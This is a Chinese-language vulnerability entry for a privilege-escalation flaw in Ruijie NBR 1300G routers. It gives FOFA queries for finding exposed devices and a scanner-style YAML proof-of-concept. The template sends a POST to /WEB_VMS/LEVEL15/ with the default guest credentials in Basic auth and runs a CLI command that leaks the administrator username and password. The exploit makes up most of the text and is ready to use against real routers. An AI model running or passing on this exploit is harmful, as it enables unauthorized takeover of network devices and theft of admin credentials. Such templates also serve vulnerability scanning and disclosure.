漏洞描述
锐捷NBR 1300G路由器 越权CLI命令执行漏洞,guest账户可以越权获取管理员账号密码
fofa: title="锐捷网络 --NBR路由器--登录界面" || app="Ruijie-NBR路由器"
ruijie-nbr1300g-cli-password-leak: ruijie-nbr1300g-cli-password-leak
PoC代码[已公开]
id: ruijie-nbr1300g-cli-password-leak
info:
name: ruijie-nbr1300g-cli-password-leak
author: abbin777
severity: high
verified: true
description: |-
锐捷NBR 1300G路由器 越权CLI命令执行漏洞,guest账户可以越权获取管理员账号密码
fofa: title="锐捷网络 --NBR路由器--登录界面" || app="Ruijie-NBR路由器"
tags: ruijie,disclosure
created: 2023/10/29
rules:
r0:
request:
method: POST
path: /WEB_VMS/LEVEL15/
headers:
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
body: command=show webmaster user&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.
expression: response.status == 200 && "webmaster level ([0-9]) username".bmatches(response.body)
expression: r0()